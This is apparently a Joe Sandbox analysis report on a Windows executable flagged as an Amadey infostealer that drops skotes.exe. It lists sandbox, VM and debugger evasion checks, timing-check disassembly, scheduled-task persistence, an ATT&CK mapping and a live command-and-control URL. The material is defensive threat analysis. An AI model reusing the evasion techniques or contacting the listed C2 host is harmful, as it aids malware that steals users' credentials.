Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54508F6 second address: 5450909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4CE2h 0x00000007 mov ecx, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450909 second address: 545090F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545090F second address: 5450927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29094h 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 33EF4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 4E53D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 4E3ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 4E3B65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 50967B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 4F1C26 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Special instruction interceptor: First address: 56ACE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C4EF4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DF53D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DF3ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DF3B65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E1967B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E01C26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E7ACE0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Code function: 0_2_054A0576 rdtsc

0_2_054A0576

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 827	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 495	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 810	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1226	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2508	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2508	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2396	Thread sleep count: 827 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2396	Thread sleep time: -1654827s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2080	Thread sleep count: 495 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2080	Thread sleep time: -14850000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3684	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2288	Thread sleep count: 1343 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2288	Thread sleep time: -2687343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2352	Thread sleep count: 810 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2352	Thread sleep time: -1620810s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2464	Thread sleep count: 1226 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2464	Thread sleep time: -2453226s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: skotes.exe, skotes.exe, 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000003.2274997620.0000000001302000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.0000000001302000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWY
Source: UyiH4t5dph.exe, 00000000.00000003.1438883566.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: UyiH4t5dph.exe, 00000000.00000003.1438883566.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: UyiH4t5dph.exe, 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

API call chain: ExitProcess graph end node

graph_2-10276

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_054A0CE5 Start: 054A0D66 End: 054A0D6B		0_2_054A0CE5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_052E00AA Start: 052E0285 End: 052E00BB		6_2_052E00AA

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Code function: 0_2_054A0576 rdtsc

0_2_054A0576

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_0030652B mov eax, dword ptr fs:[00000030h]	0_2_0030652B
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_0030A302 mov eax, dword ptr fs:[00000030h]	0_2_0030A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C1A302 mov eax, dword ptr fs:[00000030h]	2_2_00C1A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00C1652B mov eax, dword ptr fs:[00000030h]	2_2_00C1652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C1A302 mov eax, dword ptr fs:[00000030h]	6_2_00C1A302

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Jump to behavior

Source: skotes.exe, skotes.exe, 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_00BFDD91 cpuid

6_2_00BFDD91

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Code function: 0_2_002ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_002ECBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_00C22517 GetTimeZoneInformation,

6_2_00C22517

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UyiH4t5dph.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1424348425.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C0EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_00C0EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00C0DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_00C0DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
UyiH4t5dph.exe	54%	Virustotal		Browse
UyiH4t5dph.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
UyiH4t5dph.exe	100%	Avira	TR/Crypt.TPM.Gen
UyiH4t5dph.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	47%	ReversingLabs	Win32.Infostealer.Tinba

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://185.215.113.43/Zu7JuNko/index.phpv	skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpve	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpT	skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/d	skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php9	skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php:	skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php8	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php32i	skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpB	skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpE	skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpD	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpi	skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php.WSE	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpiP	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpl	skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpcoded8	skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578883
Start date and time:	2024-12-20 16:07:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UyiH4t5dph.exe renamed because original name is a hash value
Original Sample Name:	9d38889192a887e1128ec41dd417fb6d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:09:01	API Interceptor	516209x Sleep call for process: skotes.exe modified
16:08:08	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\UyiH4t5dph.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990592
Entropy (8bit):	6.57845694226229
Encrypted:	false
SSDEEP:	49152:l9PJuLnwLwJL6OBkiP4hpzl9h+q+GJNXu:l9PILnwLwJL6OBMRvdN
MD5:	9D38889192A887E1128EC41DD417FB6D
SHA1:	BF6B8A7C9EA4519EE2B4233375B9CF2CC9C7840B
SHA-256:	B23ADB76C30005DC9D5391FD1F1218B36B6B0CB85B63F5CB9AEEB0CB01D77963
SHA-512:	D4E8AEE2C1318E34537D0803F137282B5E9EC58B9A8113E38E8576F0808066F5A690149EA97F720D02642645E85EDEBA5C1DC482E6D730DA25CB99CAF604C8E3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1.....&.....@.................................W...k.............................1.............................d.1..................................................... . ............................@....rsrc...............................@....idata ............................@...ascqmpzr..........................@...vkonyklc.....@1......z-.............@....taggant.0...P1.."....-.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\UyiH4t5dph.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
